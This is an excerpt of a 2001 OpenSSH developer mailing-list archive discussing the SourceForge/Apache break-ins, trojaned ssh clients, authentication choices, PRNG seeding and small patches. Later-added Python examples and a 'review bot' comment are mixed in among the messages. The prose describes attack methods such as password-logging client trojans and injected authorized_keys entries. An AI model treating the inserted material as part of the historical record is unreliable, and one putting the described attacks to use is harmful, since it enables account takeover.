> > Same with agent forwarding and using RSAAuthentication.
>
> True. Too bad the guy wasn't using it. Why wasn't he using it?
>
> Perhaps OpenSSH should simply disallow password authentication?
>
> This type of man-in-the-middle attack (trojaned ssh) is not
> theoretical
> anymore, and password authentication is broken.
>
>
> The question is, can password authentication be (securely)
> forwarded? If
> not, then we really should remove password authentication as
> an option.
>

From GILBERT.R.LOOMIS at saic.com Fri Jun 1 23:56:14 2001
From: GILBERT.R.LOOMIS at saic.com (Loomis, Rip)
Date: Fri, 1 Jun 2001 09:56:14 -0400
Subject: Disabling Password-based auth? (was RE: recent breakins)
Message-ID: <791BD3CB503DD411A6510008C7CF647701F40BE1@col-581-exs01.cist.saic.com>

Crap. I hit send too fast. Last sentence in first paragraph
should have read "no completely secure way" for
authentication to be passed--because the agent-based
forwarding program could have been compromised as well--except
for the cases already mentioned such as SRP and RSAAuth where
the auth. information is better protected.

Even if the SF server had been capable of forwarding the
password auth. the Apache compromise could still have
happened--password authentication really isn't secure enough
for most cases.

Bottom line is that too many people use password-based
authentication, but some of them *do* need it. More people
*should* be moving to RSAAuth or SRP, but both methods
require user training. Forcing that by disabling a
long-standing feature is not the best way to proceed IMHO.
Getting people to think about what they're doing is
better--but raising user awareness is one of those things
that security always seems to depend upon...

> -----Original Message-----
> From: Loomis, Rip > Sent: Friday, June 01, 2001 9:46 AM > To: openssh-unix-dev at mindrot.org > Subject: Disabling Password-based auth? (was RE: recent breakins) > > > All-- > > But it's not as simple as forwarding the password-based > authentication. Regardless of what method was used to > SSH from system one (user's) to system two (SF), the > user then started up *a second* SSH session to go > from two (SF) to three (Apache). There is no effective > way for any authentication information from the first > session to be passed to the second, in my mind. > > Remember that the SF servers had suffered a root > compromise--so any non-password-based authentication > that would allow the user on the SF system to get to > the Apache systems could have been equally compromised. > > The correct fix is *not* to disable password-based > authentication, but to ensure that users understand > that SSH is not a silver bullet. An SSH session should > generally only be initiated from a more secure system > to a less secure system--in my case, the system on my > desk is one that I have personally hardened and that > is closely monitored, so I have no problem using SSH > to go out to my ISP and read mail. I would think > *very* carefully before using SSH in reverse, since my > ISP's systems are (IMHO) much less secure. > > I'm as appalled by what happened to SF and Apache as > anyone else, but I would ask that we work on the > user awareness issue, which I believe is the real > "root" problem (pardon the pun). For the cases > where someone needs to get from system A to system B > with some basic level of security and doesn't have any > other credentials/authentication available, there really > is no substitute for password-based authentication. > > -- > Rip Loomis > Brainbench MVP for Internet Security > http://www.brainbench.com (Transcript 1923411) > > > > -----Original Message----- 
> > From: Tom Holroyd [mailto:tomh at po.crl.go.jp] > > Sent: Friday, June 01, 2001 4:53 AM > > To: openssh-unix-dev at mindrot.org > > Subject: Re: recent breakins > > > > > > On Fri, 1 Jun 2001, Gert Doering wrote: > > > > > On Fri, Jun 01, 2001 at 11:24:49AM +0900, Tom Holroyd wrote: > > > > But what about multiple links? It should be possible to forward > > > > authentication requests back to the user's keyboard. The > > SRP protocol can > > > > be forwarded over any number of links, *even through a > > trojaned ssh* > > > > without revealing any information that a cracker can use. > > > > > > Same with agent forwarding and using RSAAuthentication. > > > > True. Too bad the guy wasn't using it. Why wasn't he using it? > > > > Perhaps OpenSSH should simply disallow password authentication? > > > > This type of man-in-the-middle attack (trojaned ssh) is not > > theoretical > > anymore, and password authentication is broken. > > > > > > The question is, can password authentication be (securely) > > forwarded? If > > not, then we really should remove password authentication as > > an option. > > > From jason at shalott.net Fri Jun 1 23:59:13 2001 
From: jason at shalott.net (Jason Stone) Date: Fri, 1 Jun 2001 06:59:13 -0700 (PDT) Subject: Disabling Password-based auth? (was RE: recent breakins) In-Reply-To: <791BD3CB503DD411A6510008C7CF647701F40BE0@col-581-exs01.cist.saic.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > But it's not as simple as forwarding the password-based > authentication. Regardless of what method was used to SSH from system > one (user's) to system two (SF), the user then started up *a second* > SSH session to go from two (SF) to three (Apache). There is no > effective way for any authentication information from the first > session to be passed to the second, in my mind. > > Remember that the SF servers had suffered a root compromise--so any > non-password-based authentication that would allow the user on the SF > system to get to the Apache systems could have been equally > compromised. That's exactly the point of SRP (well, one of the points) - it takes care of that - even if the host in the middle has been compromised and the attacker is sniffing all the ttys or something One can imagine other ways of ssh'ing through multiple systems without giving away passwords to the intermediate hosts. A trivial example - instead of saying "ssh -t host1 ssh host2" we can say instead "ssh -f -L 2222:host2:22 host1 'sleep 999999'; ssh -p 2222 localhost" - the latter commandline never allows host1 to see the plaintext of your password/key/whatever for host2. -Jason --------------------------- If the Revolution comes to grief, it will be because you and those you lead have become alarmed at your own brutality. --John Gardner -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: See https://private.idealab.com/public/jason/jason.gpg iD8DBQE7F5+1swXMWWtptckRAkBZAKCsXTzgmEebtaXiLaDiGfJwQVaqbACgpN2N zPTJ9c7I+aKTnR/RnFUqw0w= =TlgR -----END PGP SIGNATURE----- From Markus.Friedl at informatik.uni-erlangen.de Sat Jun 2 00:10:34 2001 
From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Fri, 1 Jun 2001 16:10:34 +0200
Subject: Disabling Password-based auth? (was RE: recent breakins)
In-Reply-To: ; from jason@shalott.net on Fri, Jun 01, 2001 at 06:59:13AM -0700
References: <791BD3CB503DD411A6510008C7CF647701F40BE0@col-581-exs01.cist.saic.com>
Message-ID: <20010601161034.D16295@faui02.informatik.uni-erlangen.de>

On Fri, Jun 01, 2001 at 06:59:13AM -0700, Jason Stone wrote:
> That's exactly the point of SRP (well, one of the points) - it takes care
> of that - even if the host in the middle has been compromised and the
> attacker is sniffing all the ttys or something

but the attack involved trojan ssh clients, so SRP does not help at all, whereas agent forwarded pubkey auth would have improved the situations for the 'victims'.

-m

From douglas.manton at uk.ibm.com Sat Jun 2 00:10:57 2001
From: douglas.manton at uk.ibm.com (douglas.manton at uk.ibm.com)
Date: Fri, 1 Jun 2001 15:10:57 +0100
Subject: Disabling Password-based auth? (was RE: recent breakins)
Message-ID: <80256A5E.004DE0F8.00@d06mta05.portsmouth.uk.ibm.com>

> There is no effective
> way for any authentication information from the first
> session to be passed to the second, in my mind.

SSH agent forwarding allows authentication challenges to be securely forwarded back to your local machine. The intermediary client acts as a proxy and does not benefit from watching the authentication challenge/response pass by.

Of course, it does then have access to the remote machine for that session. The trojan SSH client could always take this opportunity to add another public key to allow 3rd party access...

--------------------------------------------------------
Doug Manton, AT&T EMEA Commercial Security Solutions
E: demanton at att.com
--------------------------------------------------------
"If privacy is outlawed, only outlaws will have privacy"

From brianc at palaver.net Sat Jun 2 04:01:48 2001
From: brianc at palaver.net (Brian Capouch) Date: Fri, 01 Jun 2001 13:01:48 -0500 Subject: libcrypt vs libcrypto Message-ID: <3B17D88C.8343FA9B@palaver.net> Upgrading my ssh from 2.3 to 2.9p1, and I find I am now linking against libcrypt.so.* instead of libcrypto.so.* I get a fatal indicating that I've built against one version of SSL but am trying to run against another. Reverting back to 2.3 shows the different library link. Trying to figure out how to force it to link with the right library. Thanks. B. From dwd at bell-labs.com Sat Jun 2 04:01:27 2001 
From: dwd at bell-labs.com (Dave Dykstra) Date: Fri, 1 Jun 2001 13:01:27 -0500 Subject: recent breakins In-Reply-To: ; from tomh@po.crl.go.jp on Fri, Jun 01, 2001 at 05:52:50PM +0900 References: <20010601101256.B22854@greenie.muc.de> Message-ID: <20010601130126.A1806@lucent.com> On Fri, Jun 01, 2001 at 05:52:50PM +0900, Tom Holroyd wrote: > On Fri, 1 Jun 2001, Gert Doering wrote: > > > On Fri, Jun 01, 2001 at 11:24:49AM +0900, Tom Holroyd wrote: > > > But what about multiple links? It should be possible to forward > > > authentication requests back to the user's keyboard. The SRP protocol can > > > be forwarded over any number of links, *even through a trojaned ssh* > > > without revealing any information that a cracker can use. > > > > Same with agent forwarding and using RSAAuthentication. > > True. Too bad the guy wasn't using it. Why wasn't he using it? > > Perhaps OpenSSH should simply disallow password authentication? > > This type of man-in-the-middle attack (trojaned ssh) is not theoretical > anymore, and password authentication is broken. > > The question is, can password authentication be (securely) forwarded? If > not, then we really should remove password authentication as an option. No. That would only make breakins a little harder but it is in no way fundamentally more secure. Here is Dykstra's law of computer security: If any host is broken into, NO MATTER WHAT AUTHENTICATION MECHANISM IS USED to connect from there to a second host, the second host can also be broken into. In this case, since the ssh client on sourceforge was compromised, the cracker could have inserted other commands into the command datastream, for example commands to insert his own ~/.ssh/authorized_keys entry on the server. True, it's slightly harder than just saving a password but as soon as one hole is closed someone clever will just make a script to use the next level hole. 
Here's the corollary to Dykstra's law: The only way to improve the security of computer systems is to insure that ALL hosts that are used to connect between each other are completely secured against break-in. It was unwise of the Apache foundation developer to connect to another machine through a host that he or she was not completely confident of. - Dave Dykstra From dwd at bell-labs.com Sat Jun 2 04:24:01 2001 From: dwd at bell-labs.com (Dave Dykstra) Date: Fri, 1 Jun 2001 13:24:01 -0500 Subject: Why does prng always need to run the ssh_prng_cmds? Message-ID: <20010601132401.A2115@lucent.com> This question is primarily for Damien, but if anybody else knows the answer please chime in. Why is it that on systems with no /dev/random or PRNGD or EGD (and I have a lot of Solaris systems in this situation because I don't have root access on them) that the OpenSSH 'ssh' command has to run through all those ssh_prng_cmds every time it starts up? Why doesn't ~/.ssh/prng_seed give it enough initial entropy? The old SSH 1.2.27 'ssh' command got away with using only ~/.ssh/random_seed, which it initializes by running a lot of system commands the first time it is run. Was that not secure enough? I don't recall seeing anybody claiming it wasn't. I can't see why it wouldn't be secure, because if you assume the client machine hasn't been compromised (and able to observe the seed file) there should be no way that a cracker should be able to guess what number will be chosen in the future just by observing the numbers that are being chosen in the past and transferred over the wire. If there's no fundamental reason why it can't be done that way and you'd consider accepting a patch, I'll work on it. - Dave Dykstra From vader at conflict.net Sat Jun 2 15:27:18 2001 
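Dave Dykstra's question above is really about what a seed file can and cannot provide. The following is an added example, not OpenSSH code and not the PRNG design Dave or Damien describe: it models the ~/.ssh/prng_seed idea with a small SHA-256/HMAC based generator (an illustrative construction, not a standardised DRBG) and shows the property that matters for the thread. If the seed file is the only secret, anyone who obtains one copy of it (an NFS server operator, a backup, a snapshot of the home directory) can reproduce every value the generator emits from that file, unless fresh unpredictable input, such as the output of the ssh_prng_cmds commands, is mixed in on every start. The "fresh entropy" strings and the seed path are constructed inputs for the demo.

```python
"""Seed-file PRNG: what a saved seed does and does not give you.

Added example, not OpenSSH code. The generator, seed-file layout and helper
names are assumptions for the demonstration.
"""
import hashlib
import hmac
import os
import tempfile


def _write_private(path, data):
    """Create or overwrite the seed file with mode 0600 (constructed helper)."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(data)


class SeedFilePRNG:
    """Generator whose state is derived from a seed file plus optional fresh entropy."""

    def __init__(self, seed_path, fresh_entropy=b""):
        self.seed_path = seed_path
        st = os.stat(seed_path)
        # Refuse a seed file other users can read: its contents are the whole secret.
        if st.st_mode & 0o077:
            raise PermissionError("seed file %s is readable by others" % seed_path)
        with open(seed_path, "rb") as f:
            stored = f.read()
        # Working state = H(stored seed || fresh entropy). With empty fresh_entropy
        # the state, and therefore every output, is a pure function of the file.
        self.state = hashlib.sha256(b"state" + stored + fresh_entropy).digest()
        self.counter = 0
        # Rewrite the seed file *before* any output is used, so the file never
        # holds a state from which output already handed out can be recomputed.
        _write_private(seed_path, hashlib.sha256(b"next-seed" + self.state).digest())

    def random_bytes(self, n):
        """Counter-mode output from the state, with HMAC-SHA256 as the PRF."""
        out = b""
        while len(out) < n:
            self.counter += 1
            out += hmac.new(self.state, self.counter.to_bytes(8, "big"),
                            hashlib.sha256).digest()
        return out[:n]


# Constructed initial seed, standing in for the first-run contents of prng_seed.
INITIAL_SEED = hashlib.sha256(b"constructed initial seed for the demo").digest()


def outputs_after_seed_restore(fresh_entropy_per_run):
    """Start the PRNG twice from the *same* seed file contents, as happens when a
    copy of the file is restored between runs, and return both 32-byte outputs.
    fresh_entropy_per_run is a pair of byte strings, one per start."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "prng_seed")
        _write_private(path, INITIAL_SEED)
        first = SeedFilePRNG(path, fresh_entropy_per_run[0]).random_bytes(32)
        _write_private(path, INITIAL_SEED)      # the old copy of the file comes back
        second = SeedFilePRNG(path, fresh_entropy_per_run[1]).random_bytes(32)
    return first, second


def outputs_sequential():
    """Two normal starts in a row (seed file rewritten in between): the outputs
    differ even with no fresh entropy, because the first start updated the file."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "prng_seed")
        _write_private(path, INITIAL_SEED)
        first = SeedFilePRNG(path).random_bytes(32)
        second = SeedFilePRNG(path).random_bytes(32)
    return first, second


if __name__ == "__main__":
    a, b = outputs_after_seed_restore((b"", b""))
    print("restored seed, no fresh entropy: identical output =", a == b)
    c, d = outputs_after_seed_restore((b"cmd output run 1", b"cmd output run 2"))
    print("restored seed, fresh entropy mixed in: identical output =", c == d)
```

The sequential case is the one the seed-file design relies on; the restore case is the one it cannot defend against on its own, which is the practical reason for gathering something fresh at every start even when a seed file exists.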
From: vader at conflict.net (Jim Breton) Date: Sat, 2 Jun 2001 05:27:18 +0000 Subject: pam_opie Message-ID: <20010602052718926722.4895@conflict.net> Hi, did a search in the archives for "opie" and this is the most recent message on the topic I see: http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=98536878202858&w=2 Nigel, would you mind sending me the source for the module you've extracted from that other distribution? Also, if anyone is interested in looking at other OPIE PAM modules, here are two more: Andy Berkheimer (I've been using this one for over a year with non-ssh-related authentications, but have so far not been able to make it work with OpenSSH): http://www.tho.org/~andy/pam-opie.html Chris Evans: ftp://ferret.lmh.ox.ac.uk/users/chris/ Thanks. -- Jim B. vader at conflict.net From tomh at po.crl.go.jp Sat Jun 2 17:26:54 2001 
From: tomh at po.crl.go.jp (Tom Holroyd)
Date: Sat, 2 Jun 2001 16:26:54 +0900 (JST)
Subject: Disabling Password-based auth? (was RE: recent breakins)
In-Reply-To: <20010601161034.D16295@faui02.informatik.uni-erlangen.de>
Message-ID:

On Fri, 1 Jun 2001, Markus Friedl wrote:
> On Fri, Jun 01, 2001 at 06:59:13AM -0700, Jason Stone wrote:
> > That's exactly the point of SRP (well, one of the points) - it takes care
> > of that - even if the host in the middle has been compromised and the
> > attacker is sniffing all the ttys or something
>
> but the attack involved trojan ssh clients, so SRP does not
> help at all, whereas agent forwarded pubkey auth would have
> improved the situations for the 'victims'.

The SRP _protocol_ can be forwarded across a trojaned ssh, and not leak info, which is better than vanilla passwords. Of course the current SRP _implementation_ doesn't work that way, so you're right. But there's nothing wrong with SRP itself. The problem is that the current forwarding architecture can't deal with the SRP protocol. If it could, then it would be safer to use remote ssh clients with passwords.

Dykstra's problem can be solved, too. As he mentioned, a clever trojan could still be built -- it wouldn't get the password but it could still insert commands into the outgoing channel that would backdoor the user's account, or forward the established connection to an active attacker; BUT, if the authentication used forwarded SRP, _and_ if the session keys were switched to the new shared secret generated as a byproduct of the SRP authentication, then the MITM would get zilch.

I agree that user education could be improved. Right now it's easy for users to believe that they are safe but still shoot themselves by accident without knowing it. Sending a cleartext password to a remote ssh is not safe (vanilla or SRP). There are systems out there being cracked right now because of this.

The way that ssh clients ask for passwords could be changed.
They should not just open /dev/tty, they should go back upstream to the originating host, and open /dev/tty there. It would be even better if this could be done without the agent. The biggest problem I see with this is that when a user on host0 sees: host1% ssh host2 Enter user at host2's SRP password: he or she really has no way to tell if that prompt is being issued by host1 or by the local host0 client... If they're running X or similar you could pop up a window, but that's not a general solution. From pekkas at netcore.fi Sat Jun 2 18:54:24 2001 
From: pekkas at netcore.fi (Pekka Savola) Date: Sat, 2 Jun 2001 11:54:24 +0300 (EEST) Subject: authorized_keys2 directory idea Message-ID: Hi, In a mail about two weeks ago, I brought up an idea: --- How SSH makes this easier is that you only have to sync the authorized_keys2 database to root account's .ssh/ every time new admin comes in/leaves the house. This can even be automatized rather easily. A more modular hack would be using authorized_keys2 _directory_, and the keys in there would all be counted as authorized. Thus only one file copy/removal would do the job, no need for sync; this would be profitable in environments where all admins don't have access to all systems. --- Root would not be the only one to profit from this; you would only need to copy the pubkey file in the right dir (with a descriptive name if you like!), and authorization would work without file editing. Also, if you need to refresh just one key, you could just scp that one over, no need to edit the file either. The more I think of this, this sounds more and more like a nice feature to have :-). It'd probably be better be like .ssh/authorized_keys.d/ or the like, I suppose. What do you think -- would this be useful? Bloat? Could it be considered to be merged if it was implemented? I made some preliminary checking, and I don't think this would add too much new code; look up all files in the directory, disqualify those with odd characters in them (e.g. allow [0-9a-zA-Z_. at -]) , insert the rest to current key check method one by one until a matching key is found. Btw, I noticed when comparing auth-rsa.c/auth2.c that auth2.c does not print debug message: --- openssh-cvs/auth2.c Sat Jun 2 11:14:21 2001 +++ openssh.fix/auth2.c Sat Jun 2 11:13:40 2001 
@@ -26,6 +28,8 @@ if (!f) { /* Restore the privileged uid. */ restore_uid(); + packet_send_debug("Could not open %.900s for reading.", file); + packet_send_debug("If your home is on an NFS volume, it may need to be world-readable."); return 0; } if (options.strict_modes) { was this left out by design, or a leftover in auth-rsa.c ? -- Pekka Savola "Tell me of difficulties surmounted, Netcore Oy not those you stumble over and fall" Systems. Networks. Security. -- Robert Jordan: A Crown of Swords From _nuub at yahoo.com Sat Jun 2 19:26:38 2001 
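Review bot: the two packet_send_debug() calls added before `return 0` send the failure reason, including the expanded path in `file`, to a client that has not authenticated yet, so an unauthenticated peer learns whether the account's home directory exists and where it lives, and the NFS hint tells it something about the server's storage layout. Prefer a server-side log call that the administrator can read in sshd's own log, and leave the client with the plain authentication failure; if the client-visible hint is wanted, gate it on the user having authenticated. The hunk is otherwise straightforward, and the duplicate in auth-rsa.c should be changed the same way so the two code paths do not drift.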
From: _nuub at yahoo.com (nuuB)
Date: Sat, 2 Jun 2001 02:26:38 -0700 (PDT)
Subject: Recent breakins / SSHD root hole?
Message-ID: <20010602092638.38588.qmail@web11205.mail.yahoo.com>

The trojaned ssh client is nothing new to the hacker community, and the statement in the previous thread claiming "This type of man-in-the-middle attack (trojaned ssh) is not theoretical anymore, and password authentication is broken." is an example of how many people still think "hacking" is something very difficult and nothing short of a genius is required to make the transition from theoretical to practical. It is probably the media's fault that these misconceptions are so widely spread. In this case it is just a matter of extending the program to do a small task besides the regular tasks (i.e. to save all passwords entered in a file). The patch is probably about 10 to 15 lines of code, and was done in 10 minutes. Not that the cracker would have to have written it himself - there have been patches for ssh backdoors in wide circulation since ssh came out. "Password authentication" has probably been "broken" since it was first introduced. I am quite sure that the hackers back at M.I.T knew how to trojan their telnet clients.

But I digress. The reason for this post is something mentioned in the apache.org statement:

"The ssh client at SourceForge had been compromised to log outgoing names and passwords, so the cracker was thus able get a shell on apache.org. After unsuccessfully attempting to get elevated privileges using an old installation of Bugzilla on apache.org, the cracker used a weakness in the ssh daemon (OpenSSH 2.2) to gain root privileges."

Trojaned ssh clients are nothing new. But what about this "weakness" in the daemon that was used to gain root privileges? What is it about? Has it been fixed in later versions?
Is it remotely exploitable (doesn't sound likely, as then the cracker wouldn't have gone through the trouble to sniff a valid password on sourceforge - unless this particular hole requires a valid user/password pair).

Basically what I'd like to know is: What version of the OpenSSH daemon would I need to run in order NOT to be vulnerable to this "weakness"?

nuuB

From kris at obsecurity.org Sun Jun 3 07:31:53 2001
From: kris at obsecurity.org (Kris Kennaway)
Date: Sat, 2 Jun 2001 14:31:53 -0700
Subject: Recent breakins / SSHD root hole?
In-Reply-To: <20010602092638.38588.qmail@web11205.mail.yahoo.com>; from _nuub@yahoo.com on Sat, Jun 02, 2001 at 02:26:38AM -0700
References: <20010602092638.38588.qmail@web11205.mail.yahoo.com>
Message-ID: <20010602143153.A7257@xor.obsecurity.org>

On Sat, Jun 02, 2001 at 02:26:38AM -0700, nuuB wrote:
> Trojaned ssh clients are nothing new. But what about this "weakness" in the
> daemon that was used to gain root privileges? What is it about? Has it been
> fixed in later versions? Is it remotely exploitable (doesn't sound likely, as
> then the cracker wouldn't have gone through the trouble to sniff a valid
> password on sourceforge - unless this particular hole requires a valid
> user/password pair).
>
> Basically what I'd like to know is: What version of the OpenSSH daemon would I
> need to run in order NOT to be vulnerable to this "weakness"?

Sounds like ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:30.openssh.asc

Kris

From kris at obsecurity.org Sun Jun 3 07:33:44 2001
From: kris at obsecurity.org (Kris Kennaway)
Date: Sat, 2 Jun 2001 14:33:44 -0700
Subject: pam_opie
In-Reply-To: <20010602052718926722.4895@conflict.net>; from vader@conflict.net on Sat, Jun 02, 2001 at 05:27:18AM +0000
References: <20010602052718926722.4895@conflict.net>
Message-ID: <20010602143344.B7257@xor.obsecurity.org>

On Sat, Jun 02, 2001 at 05:27:18AM +0000, Jim Breton wrote:
> Hi, did a search in the archives for "opie" and this is the most recent
> message on the topic I see:
>
> http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=98536878202858&w=2
>
> Nigel, would you mind sending me the source for the module you've
> extracted from that other distribution?

There's a BSD-licensed pam_opie here which works well with OpenSSH:

http://www.FreeBSD.org/cgi/cvsweb.cgi/src/lib/libpam/modules/pam_opie/

Kris

From auto92089 at hushmail.com Sun Jun 3 08:02:04 2001
From: auto92089 at hushmail.com (auto92089 at hushmail.com)
Date: Sat, 2 Jun 2001 16:02:04 -0600 (CDT)
Subject: ssh-keygen(1) misinfo: English prose entropy 0.6 - 1.3 b/char!
Message-ID: <200106022138.OAA26245@user3.hushmail.com>

Quoth manpage:

    otherwise easily guessable (English prose has only 1-2 bits of
    entropy per word, and provides very bad passphrases). The passphrase can be

Whoever wrote that manpage is either possessed of some amazing human insight to which I am not privy, chose a very non-representative sample of English prose, or is just plain wrong. I know none of you would ever make such a glaring error, and should anyone remotely associated with you have done so, it must have been due to acute sleep deprivation or near-toxic levels of caffeine, the latter being more conducive to errors of commission, so please fix it before it spreads via the "reference" effect or simply tarnishes your image.

Should I be in grievous hallucinatory error, the aforementioned common-sense defying measurement necessitates a gold-plated reference beyond reproach with which to rain smack down upon the non-believers and other intellectual trilobites.

For verification:
1) do a quick web search
2) read Shannon's experiment
3) Cover an unseen word in an ordinary book and see if you can guess it correctly every second to fourth time. Consider a lucrative career in cryptanalysis if you are consistently successful...

I, Zone Lee

From pekkas at netcore.fi Sun Jun 3 08:11:12 2001
From: pekkas at netcore.fi (Pekka Savola) Date: Sun, 3 Jun 2001 01:11:12 +0300 (EEST) Subject: ssh-keygen(1) misinfo: English prose entropy 0.6 - 1.3 b/char! In-Reply-To: <200106022138.OAA26245@user3.hushmail.com> Message-ID: On Sat, 2 Jun 2001 auto92089 at hushmail.com wrote: > For verification: > 1) do a quick web search > 2) read Shannon's experiment > 3) Cover an unseen word in an ordinary book and see if you > can guess it correctly every second to fourth time. Consider > a lucrative career in cryptanalysis if you are consistently > successful... Trolling is such fun, isn't it? Entropy rate does not mean that; if you are shown an English word, character by character, how long does it take to guess the whole word? Try a couple of them: moro_ idio_ trol_ Not so hard is it? I'm sure Snake Oil Security Co. is looking for new cryptanalysts; consider applying. -- Pekka Savola "Tell me of difficulties surmounted, Netcore Oy not those you stumble over and fall" Systems. Networks. Security. -- Robert Jordan: A Crown of Swords From deumens at qtp.ufl.edu Sun Jun 3 11:56:21 2001 
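The two posts above argue about what "bits of entropy per character" or "per word" means for English prose. The following is an added example, not part of the thread and not the ssh-keygen code: it computes the plug-in versions of Shannon's F_n estimates (bits per character given the previous n-1 characters) on a constructed English sample, and turns a bits-per-character rate into a passphrase length. The sample text, the rates handed to chars_needed and all function names are assumptions for the demonstration; on a sample this short the higher-order estimates are biased low, which is exactly why Shannon measured long-range entropy with human guessing rather than with counts.

```python
"""Shannon-style n-gram entropy estimates for English text (added example)."""
import math
from collections import Counter

# Constructed sample; it starts with a pangram so every letter of the alphabet is present.
SAMPLE = (
    "The quick brown fox jumps over the lazy dog. Passphrases taken from ordinary "
    "English prose are far easier to guess than their length suggests, because each "
    "letter is strongly constrained by the letters before it. A reader who has seen "
    "the first few letters of a word can usually complete it, and a reader who has "
    "seen the first few words of a sentence can often complete that too. Random "
    "strings have no such structure, which is exactly why they are hard to remember "
    "and hard to guess."
)


def normalise(text):
    """Lower-case the text and keep only a-z plus single spaces (27-symbol alphabet)."""
    out, prev_space = [], True
    for ch in text.lower():
        if "a" <= ch <= "z":
            out.append(ch)
            prev_space = False
        elif not prev_space:
            out.append(" ")
            prev_space = True
    return "".join(out).strip()


def conditional_entropy(text, n):
    """F_n: empirical H(X_i | X_{i-n+1..i-1}) in bits per character.

    n=1 gives the plain unigram entropy (empty context). Counts come from the
    n-grams of the sample itself, so contexts and n-grams are consistent."""
    text = normalise(text)
    grams = Counter(text[i:i + n] for i in range(len(text) - n + 1))
    contexts = Counter()
    for g, c in grams.items():
        contexts[g[:-1]] += c
    total = sum(grams.values())
    return -sum((c / total) * math.log2(c / contexts[g[:-1]])
                for g, c in grams.items())


def estimates(text, max_n=3):
    """Return {"F0": log2(alphabet size), "F1": ..., "F2": ..., ...}."""
    t = normalise(text)
    result = {"F0": math.log2(len(set(t)))}
    for n in range(1, max_n + 1):
        result["F%d" % n] = conditional_entropy(t, n)
    return result


def chars_needed(target_bits, bits_per_char):
    """Characters of prose needed to reach target_bits at the given entropy rate."""
    return math.ceil(target_bits / bits_per_char)


def words_needed(target_bits, bits_per_word):
    """Same calculation for a per-word rate, as the manpage phrases it."""
    return math.ceil(target_bits / bits_per_word)


if __name__ == "__main__":
    for name, value in estimates(SAMPLE).items():
        print("%s = %.2f bits/char" % (name, value))
    print("chars for 128 bits at 1.3 b/char:", chars_needed(128, 1.3))
    print("words for 128 bits at 1.5 b/word:", words_needed(128, 1.5))
```

F0 is the entropy of a uniformly random choice from the alphabet; each increase in n lets the count exploit more of the structure of English, so the values fall. Whichever rate one believes, a passphrase drawn from prose needs to be many times longer than a random string for the same strength.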
From: deumens at qtp.ufl.edu (Erik Deumens) Date: Sat, 2 Jun 2001 21:56:21 -0400 (EDT) Subject: OpenSSH 2.9p1 on Solaris 7 x86 problems Message-ID: <200106030156.VAA10229@qtp.ufl.edu> Dear sir- I have been trying to build and run OpenSSH 2.9p1 on Solaris 7 for x86. I tried with SunPRO 5.0 compilers and gcc 2.95.2. I am using zlib 1.1.3 and openssl-0.9.6a. In all cases I can get ssh to work for version 1. In no case can I get version 2 to connect. With the SunPRO 5.0 compiler the signature does not verify, with gcc, ssh dies in segmentation violation. I can provide more details, if you wish. I use no special options in configure. Thanks for any help or pointers, Erik +--------------------------------------------------------------------+ | Dr. Erik Deumens | | Director of Computing | | Institute for Theory and Computation | | in Molecular and Materials Sciences | | Department of Chemistry Department of Physics | | | | Quantum Theory Project deumens at qtp.ufl.edu | | New Physics Building 2334 http://www.qtp.ufl.edu/~deumens | | University of Florida (352)392-6980 | | Gainesville, Florida 32611-8435 FAX (352)392-8722 | +--------------------------------------------------------------------+ From raj at cerias.purdue.edu Sun Jun 3 13:19:19 2001 
From: raj at cerias.purdue.edu (Brian Poole) Date: Sat, 2 Jun 2001 22:19:19 -0500 Subject: Handling of password & account expirations Message-ID: <20010602221919.M25314@basm.cerias.purdue.edu> Hello, There has been an annoyance with OpenSSH that has been bugging me lately. It pays no attention to pw_change and pw_expire fields from the passwd file for users by default. Thus even if the admin has set a user's account to expire 5 days ago they can still login. So one might say, just add 'UseLogin yes' and all of your problems will be solved. This of course is not a good answer, because as has been noted recently on the list and is mentioned in the man page, UseLogin does not affect remote command execution, thus people can still use scp, sftp or just execute random shell commands. It would be simplistic to regain access to one's account, even if it was expired and UseLogin set to yes IMO. A few remote commands and you could upload an alternate way of logging in with an interactive account. This defeats the entire purpose of account & password expiration IMO and should be fixed immediately. Since no one else has seemed concerned about this when I posted it on the OpenBSD mailing lists I have written a patch to attempt to address the problem myself. This has already been submitted to bugs at openbsd several days ago, but met no response, thus I'm submitting it here as well (probably proper procedure in the first place). Patch is available at: http://www.cerias.purdue.edu/homes/rajak/openbsd/patch_exp-support The changes are minor, should not add any significant overhead and seem to be the right thing to do in any case. I would personally like to see a sshd config option that allowed customizable warning times, which I added in session.c (very similar to how login does it) with a -fixed- time (1 week), but I do not want to waste more time writing patches if they are just going to be ignored. 
Looking forward to some response/feedback,

-b

From markus.friedl at informatik.uni-erlangen.de Sat Jun 2 18:28:54 2001
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Sat, 2 Jun 2001 10:28:54 +0200
Subject: another bug report
In-Reply-To: ; from mugz@x-mafia.org on Fri, Jun 01, 2001 at 02:09:57AM -0400
References: <20010524125150.D22475@folly>
Message-ID: <20010602102854.F14694@folly>

can you start
	$ sshd -d -d -d -p 1234
and connect to port 1234 with securecrt?

the traces could be of use to us.

On Fri, Jun 01, 2001 at 02:09:57AM -0400, mugz wrote:
>
> I tracked this one down. I am running OpenSSH_2.9p1 and if a user logs in
> with securecrt and uses the "disconnect" button to disconnect from the
> shell I get this error in the log:
>
> Jun 1 01:47:35 members sshd[16130]: error: session_close_by_channel: kill
> 16131: Operation not permitted
> Jun 1 01:47:35 members sshd[16130]: error: session_close_by_channel: kill
> 16131: Operation not permitted
>
> Also, when I type:
>
> last -30 | grep still
>
> It shows them as still logged in, even though they have long since
> disconnected. This error does not occur if they use "exit" to exit the
> shell, also I do not see this same error in PuTTY.
>
> mugz
>
>

From markus.friedl at informatik.uni-erlangen.de Sat Jun 2 18:21:30 2001
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Sat, 2 Jun 2001 10:21:30 +0200
Subject: primes
